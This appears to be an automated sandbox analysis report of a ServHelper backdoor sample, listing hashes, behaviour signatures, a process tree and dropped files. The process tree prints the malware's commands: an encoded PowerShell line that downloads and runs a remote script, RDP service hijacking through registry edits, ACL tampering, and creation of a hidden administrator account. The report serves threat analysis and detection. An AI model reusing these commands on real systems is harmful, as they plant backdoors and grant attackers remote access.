Analysis
-
max time kernel
131s -
max time network
70s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
24-05-2021 19:08
General
-
Target
clr.exe
-
Size
6.0MB
-
MD5
1e9f45329ffece31382bb884367f58df
-
SHA1
52d3d55364d8c4d350231d38bfe6eb156cf8473f
-
SHA256
8779c8ac97c45254bc243e2ee79b436d1a96bc56885dcaa72c4837790b2071fc
-
SHA512
12272d5f20c42764992420aa1a178b16d7ef1873f2c9619bd8ac16e0eb9a0067a08a9d70863c1d3e95dd4a2aa19c081ae0baabaf3431f5068ea7191c8f4d6c62
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 1 IoCs
-
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
-
Sets DLL path for service in the registry 2 TTPs
-
UPX packed file 2 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Loads dropped DLL 2 IoCs
-
Modifies file permissions 1 TTPs 8 IoCs
-
Drops file in System32 directory 1 IoCs
-
Drops file in Windows directory 21 IoCs
-
Modifies data under HKEY_USERS 4 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 13 IoCs
-
Suspicious behavior: LoadsDriver 5 IoCs
-
Suspicious use of AdjustPrivilegeToken 18 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\clr.exe"C:\Users\Admin\AppData\Local\Temp\clr.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ccfjqaqy\ccfjqaqy.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES32D3.tmp" "c:\Users\Admin\AppData\Local\Temp\ccfjqaqy\CSCD6FFA7EBF60348F48428343851402674.TMP"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
-
C:\Windows\system32\net.exenet start TermService5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc Jzjr376g /add1⤵
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc Jzjr376g /add2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc Jzjr376g /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc Jzjr376g1⤵
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc Jzjr376g2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc Jzjr376g3⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_36c331c1-bfad-48c8-9440-195a927a235eMD5
6f0d509e28be1af95ba237d4f43adab4
SHA1c665febe79e435843553bee86a6cea731ce6c5e4
SHA256f545be30e70cd6e1b70e98239219735f6b61c25712720bb1e1738f02be900e7e
SHA5128dbadc140fd18eb16e2a282e3a0a895299b124850e7b9454a3f24e1cc1c090c5bebfbff5062e8807369e84ed7359e0854722cfd45b9a63681f9fea8c97fab797
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_36f9974b-2fc7-4497-918b-7763c9109259MD5
d89968acfbd0cd60b51df04860d99896
SHA1b3c29916ccb81ce98f95bbf3aa8a73de16298b29
SHA2561020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9
SHA512b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6576ec74-f68d-452b-95e8-a4c220a44761MD5
e5b3ba61c3cf07deda462c9b27eb4166
SHA1b324dad73048be6e27467315f82b7a5c1438a1f9
SHA256b84fae85b6203a0c8c9db3ba3c050c97d6700e5c9ae27dd31c103ec1bbb02925
SHA512a5936a098db2e8c0d0231fd97d73cc996ad99897fd64f0e5c6761c44b8eb2db2bff477843d326503e6027c1113da0e8e35f4227195a3cf505c5a374ebe0f67fc
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6ea45d7b-adf8-4cc2-940b-a06239abe687MD5
faa37917b36371249ac9fcf93317bf97
SHA1a0f0d84d58ee518d33a69f5f1c343aa921c8ffd4
SHA256b92f1a891dbe4152a1f834774cc83378d8b4cffb7e344a813219d74ec4084132
SHA512614d3692e5be7554a72a38af408458254af271eaf6855f322ae07aaa647b1478c7ad13027285c8d9999db3739d65ac85ecfdf3e56acca8484083aa0e31de2198
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_944601d4-ee7e-4c5d-b405-d5142631abfaMD5
2d5cd190b5db0620cd62e3cd6ba1dcd3
SHA1ff4f229f4fbacccdf11d98c04ba756bda80aac7a
SHA256ab9aee31b3411bcc5a5fb51e9375777cca79cfb3a532d93ddd98a5673c60571d
SHA512edb2a46f3ee33b48f8fe0b548c1e7940978d0e4ac90d5090807d8b5c8b1320217e5d66990b1d0a85546acbbaf9b601590d35de87de234da8eafd60d12fdce610
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b9051034-024a-4688-a98b-9aa9db1cfeadMD5
7f79b990cb5ed648f9e583fe35527aa7
SHA171b177b48c8bd745ef02c2affad79ca222da7c33
SHA256080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683
SHA51220926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c3cf8d24-f3d1-4a90-aa19-f61e26e8b79eMD5
a70ee38af4bb2b5ed3eeb7cbd1a12fa3
SHA181dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9
SHA256dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d
SHA5128c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndexMD5
f0f4db609e79c44946dcd8f4925706f1
SHA1f52a2b9a65f7fa3303fbb3964460fbb2415687b8
SHA2560b9e06fdf30dfd35e730ff78554100aa6b5edd3dafde60274731fd013e95df63
SHA5123ce6a933426609d09cd7965a653be48c6679f9cfa2bd67452dea94703547f35c7c9849553e7891d72153eeffbb6edd5dd661b4f9ee90d3654cf56db1acaed68c
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndexMD5
46f6bbca0498815c23887f4c881770dd
SHA118e703745f5d3a0970cf54f51541c85d076896e7
SHA256fe7ebcf942f152a4e8bc17d30024c01537cb7ffd19cf83bd584004e1fe2b133e
SHA5127d8cd477cc4cdd3883600476257e303134e21e948146de9350fb1e66f39c68f65c4acb10a2c418b31f926e51656fb8cc2234872f47ce956f1190fc9e357374c8
-
C:\Users\Admin\AppData\Local\Temp\Get-Content.PS1MD5
57c548b15fb26ecf9053a5adc58db9f2
SHA1c9f15dbef109de66634ddd66d205aa8a13d90428
SHA25684a3d6308c04697e1b736ba62d3f9cc8b94c0183714f67cf027c6681dfad47bb
SHA512eb99e2574128f8f6c1e6cafff310c379c8e0a8968293038bebe68ec1864b83f01bc9b72314699ea9ecf49054103ca05d6de80201519047424a1f0b865365f10a
-
C:\Users\Admin\AppData\Local\Temp\RES32D3.tmpMD5
cdadd8a8415301de4772636b3344e723
SHA190b2a72b1104d83c55abfd1d9f628a42750a457b
SHA256d3d7f1d6cc93080b29a6ff06f4e97a64362d8404951fc9d3ed6b809d7c3569b4
SHA512ebed0814844cdb7a2b0b778ef038efeaa1b74ab1f03b1ed8ca757ab806982782d6ed0691ff9bb7d7e1bb6c28b0e4da91b8f2c0564c8395ff767ca2bd19f3c279
-
C:\Users\Admin\AppData\Local\Temp\ccfjqaqy\ccfjqaqy.dllMD5
d6776d5ed681a9bdc195119cdf3da40b
SHA184e1dc90145e2e04a5b22b77035286dcb3e7cefd
SHA256ccd015772bcc286dc46f14c716e79b3c6f9997485211631ef4c2b687a2303a54
SHA5128d545e0379f8eb2083c8d0f83a280988a49f174ed907c3ad695d17eecdcfedee725379b26609a2bdbf0d99d3706c046f94b29c72f398772a944d8e683e55c8fd
-
C:\Users\Admin\AppData\Local\Temp\ready.ps1MD5
37330f50cf392bca59567a22de3b836a
SHA1f7b37328533a133567aa28f03015da69e2e36547
SHA256a34c2923388f87e84a4f67f123626af4eff5e7d7e5abe327b6a1b1aa55a12de1
SHA5125d1c19df182caf82388fd05e30422fa957af30a4092334a53a128e36d6c3ce2cb20aa10d96344cd8b1b145180df4d737b30bbd48a1c809ce25a82912397b19a6
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msMD5
bf89b95cb74973524bab68f20975c41f
SHA10976821869a1de4015ef8bc7171c66ac2f5f53d0
SHA256fd763799f06faf02e487c1488f6584a776155c52e20251b06b71eab7bbd60d0e
SHA512e5991463d6a5cdefa16cebf603b6baa0557d244c48d39d4ac943da7f55efce329af39e5934f02abfce64ba56916f19b91a6fe503aea6a2c624f3ed22dd332891
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msMD5
bf89b95cb74973524bab68f20975c41f
SHA10976821869a1de4015ef8bc7171c66ac2f5f53d0
SHA256fd763799f06faf02e487c1488f6584a776155c52e20251b06b71eab7bbd60d0e
SHA512e5991463d6a5cdefa16cebf603b6baa0557d244c48d39d4ac943da7f55efce329af39e5934f02abfce64ba56916f19b91a6fe503aea6a2c624f3ed22dd332891
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msMD5
bf89b95cb74973524bab68f20975c41f
SHA10976821869a1de4015ef8bc7171c66ac2f5f53d0
SHA256fd763799f06faf02e487c1488f6584a776155c52e20251b06b71eab7bbd60d0e
SHA512e5991463d6a5cdefa16cebf603b6baa0557d244c48d39d4ac943da7f55efce329af39e5934f02abfce64ba56916f19b91a6fe503aea6a2c624f3ed22dd332891
-
C:\Windows\system32\rfxvmt.dllMD5
dc39d23e4c0e681fad7a3e1342a2843c
SHA158fd7d50c2dca464a128f5e0435d6f0515e62073
SHA2566d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA5125cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
-
\??\PIPE\samrMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\c:\Users\Admin\AppData\Local\Temp\ccfjqaqy\CSCD6FFA7EBF60348F48428343851402674.TMPMD5
189cb9a7c35792c51497749b6c7295c1
SHA1b24433ef9c407e8e02511dc64d1f8e57463e77b1
SHA2564bc9723d28ba357768dbb69d4757408e450a8a8931aa72a9d2129addbdbc0ba5
SHA5127a15aafe88b28dc12e08af01c8ea8a5df915825bf85f10bc31c69b809caa1431d54ec365890e41eac6e363462cba620df15ba796b45376007378c629d0802b05
-
\??\c:\Users\Admin\AppData\Local\Temp\ccfjqaqy\ccfjqaqy.0.csMD5
fdff1f264c5f5570a5393659b154cb88
SHA1de254de5e517074a9986b36fec83f921aa9aa497
SHA256ff936e8436684fa709bed64fea9021468fd0c744a4e3412b3ef86e642d6c3769
SHA512db434d37d6e5acb096c26abe7f07744a1a1379179f013810df3f95e41e2b7f55dfe7dc65d053a3d0c6401bc13c7dd99e940073fbe741237966620761c3b9e35a
-
\??\c:\Users\Admin\AppData\Local\Temp\ccfjqaqy\ccfjqaqy.cmdlineMD5
335e26febddf81c7f7eb490526c1f96c
SHA114de76d68dcd6d9a3bf20b030afdfc5910c5a62c
SHA256fc68f3f73d09e8913f907058f9a50d33e51fc4fae38ac89167f4da9580e2eef1
SHA5122f8c2c68d273cc446f3d12de0b8b30be8cb488903113858a90ff22ffd37d5a61b78fe1dba9e2feacad670411d3cd72c92f389ad8a8ab07efbf5a316522fde362
-
\Windows\Branding\mediasrv.pngMD5
ddc17bc082038ee52b30808daf87f090
SHA1f862491e1195e039e05bd241856a9015846b3096
SHA256a04583453340fa979e7efae6022c531ef06e175c388a15214bd6d32a67f1e627
SHA5126f5edb94f56ec7e70199bfce671f20b111b102a017ba48ff7b391b09bb7485d3a7be9c2bdc2fa587b463a2874c795992db4a5dd824a4d7a4c0fdeb41ff3a9370
-
\Windows\Branding\mediasvc.pngMD5
072548125d601f1048b4cb73682cbb7b
SHA15d3582747ad69cff9db5aa45b20816a7c2218cf0
SHA256e4453d95ba2fa4de68fa324a1dc8e59028969d86ea5b5a8b08a1bc33bce40582
SHA512b54f5fcf9d153a61c82dc698d7dc7314720fda304e013ad8dc04fc277e6ff905a049f945f2adcc61df7b4853d38d92da026b7836f6aa52a331a4cba9a56184fb
-
memory/296-159-0x0000000000000000-mapping.dmp
-
memory/296-185-0x0000000000000000-mapping.dmp
-
memory/304-196-0x0000000000000000-mapping.dmp
-
memory/304-189-0x0000000000000000-mapping.dmp
-
memory/304-184-0x0000000000000000-mapping.dmp
-
memory/340-181-0x0000000000000000-mapping.dmp
-
memory/376-148-0x00000000025E4000-0x00000000025E6000-memory.dmpFilesize
8KB
-
memory/376-147-0x00000000025E0000-0x00000000025E2000-memory.dmpFilesize
8KB
-
memory/376-142-0x0000000000000000-mapping.dmp
-
memory/376-190-0x0000000000000000-mapping.dmp
-
memory/660-183-0x0000000000000000-mapping.dmp
-
memory/732-202-0x0000000019520000-0x0000000019522000-memory.dmpFilesize
8KB
-
memory/732-197-0x0000000000000000-mapping.dmp
-
memory/732-204-0x000000001952A000-0x0000000019549000-memory.dmpFilesize
124KB
-
memory/732-203-0x0000000019524000-0x0000000019526000-memory.dmpFilesize
8KB
-
memory/760-157-0x0000000000000000-mapping.dmp
-
memory/788-63-0x0000000043626000-0x0000000043627000-memory.dmpFilesize
4KB
-
memory/788-59-0x0000000043AD0000-0x0000000043EF1000-memory.dmpFilesize
4.1MB
-
memory/788-62-0x0000000043624000-0x0000000043626000-memory.dmpFilesize
8KB
-
memory/788-61-0x0000000043622000-0x0000000043624000-memory.dmpFilesize
8KB
-
memory/788-64-0x0000000043627000-0x0000000043628000-memory.dmpFilesize
4KB
-
memory/812-166-0x0000000000000000-mapping.dmp
-
memory/928-205-0x0000000000000000-mapping.dmp
-
memory/940-174-0x0000000000000000-mapping.dmp
-
memory/956-206-0x0000000000000000-mapping.dmp
-
memory/1028-188-0x0000000000000000-mapping.dmp
-
memory/1056-165-0x0000000000000000-mapping.dmp
-
memory/1072-187-0x0000000000000000-mapping.dmp
-
memory/1072-78-0x0000000000000000-mapping.dmp
-
memory/1320-75-0x0000000000000000-mapping.dmp
-
memory/1364-100-0x0000000002060000-0x0000000002061000-memory.dmpFilesize
4KB
-
memory/1364-97-0x000000001B7C0000-0x000000001B7C1000-memory.dmpFilesize
4KB
-
memory/1364-120-0x000000001B730000-0x000000001B731000-memory.dmpFilesize
4KB
-
memory/1364-87-0x0000000000000000-mapping.dmp
-
memory/1364-119-0x000000001B720000-0x000000001B721000-memory.dmpFilesize
4KB
-
memory/1364-93-0x0000000002670000-0x0000000002672000-memory.dmpFilesize
8KB
-
memory/1364-99-0x00000000026F0000-0x00000000026F1000-memory.dmpFilesize
4KB
-
memory/1364-95-0x00000000025A0000-0x00000000025A1000-memory.dmpFilesize
4KB
-
memory/1364-106-0x000000001B560000-0x000000001B561000-memory.dmpFilesize
4KB
-
memory/1364-94-0x0000000002674000-0x0000000002676000-memory.dmpFilesize
8KB
-
memory/1448-191-0x0000000000000000-mapping.dmp
-
memory/1448-186-0x0000000000000000-mapping.dmp
-
memory/1448-170-0x0000000000000000-mapping.dmp
-
memory/1452-160-0x0000000000000000-mapping.dmp
-
memory/1452-178-0x0000000000000000-mapping.dmp
-
memory/1464-167-0x0000000000000000-mapping.dmp
-
memory/1468-162-0x0000000000000000-mapping.dmp
-
memory/1488-182-0x0000000000000000-mapping.dmp
-
memory/1524-85-0x000000001C480000-0x000000001C481000-memory.dmpFilesize
4KB
-
memory/1524-67-0x0000000001F70000-0x0000000001F71000-memory.dmpFilesize
4KB
-
memory/1524-65-0x0000000000000000-mapping.dmp
-
memory/1524-86-0x0000000002560000-0x0000000002561000-memory.dmpFilesize
4KB
-
memory/1524-66-0x000007FEFBC81000-0x000007FEFBC83000-memory.dmpFilesize
8KB
-
memory/1524-101-0x000000001AC2A000-0x000000001AC49000-memory.dmpFilesize
124KB
-
memory/1524-84-0x000000001C400000-0x000000001C401000-memory.dmpFilesize
4KB
-
memory/1524-72-0x0000000001ED0000-0x0000000001ED1000-memory.dmpFilesize
4KB
-
memory/1524-69-0x000000001AC20000-0x000000001AC22000-memory.dmpFilesize
8KB
-
memory/1524-74-0x000000001C330000-0x000000001C331000-memory.dmpFilesize
4KB
-
memory/1524-68-0x000000001ACA0000-0x000000001ACA1000-memory.dmpFilesize
4KB
-
memory/1524-82-0x0000000001FB0000-0x0000000001FB1000-memory.dmpFilesize
4KB
-
memory/1524-156-0x000000001C670000-0x000000001C671000-memory.dmpFilesize
4KB
-
memory/1524-70-0x0000000002410000-0x0000000002411000-memory.dmpFilesize
4KB
-
memory/1524-71-0x000000001AC24000-0x000000001AC26000-memory.dmpFilesize
8KB
-
memory/1544-175-0x0000000000000000-mapping.dmp
-
memory/1596-163-0x0000000000000000-mapping.dmp
-
memory/1640-173-0x0000000000000000-mapping.dmp
-
memory/1644-164-0x0000000000000000-mapping.dmp
-
memory/1660-192-0x0000000000000000-mapping.dmp
-
memory/1660-172-0x0000000000000000-mapping.dmp
-
memory/1676-161-0x0000000000000000-mapping.dmp
-
memory/1764-127-0x000000001AAA0000-0x000000001AAA2000-memory.dmpFilesize
8KB
-
memory/1764-131-0x000000001B530000-0x000000001B531000-memory.dmpFilesize
4KB
-
memory/1764-128-0x000000001AAA4000-0x000000001AAA6000-memory.dmpFilesize
8KB
-
memory/1764-133-0x000000001B7C0000-0x000000001B7C1000-memory.dmpFilesize
4KB
-
memory/1764-129-0x0000000002490000-0x0000000002491000-memory.dmpFilesize
4KB
-
memory/1764-194-0x0000000000000000-mapping.dmp
-
memory/1764-134-0x0000000001E10000-0x0000000001E11000-memory.dmpFilesize
4KB
-
memory/1764-121-0x0000000000000000-mapping.dmp
-
memory/1820-168-0x0000000000000000-mapping.dmp
-
memory/1912-171-0x0000000000000000-mapping.dmp
-
memory/1928-195-0x0000000000000000-mapping.dmp
-
memory/1964-169-0x0000000000000000-mapping.dmp
-
memory/1996-176-0x0000000000000000-mapping.dmp
-
memory/2008-177-0x0000000000000000-mapping.dmp
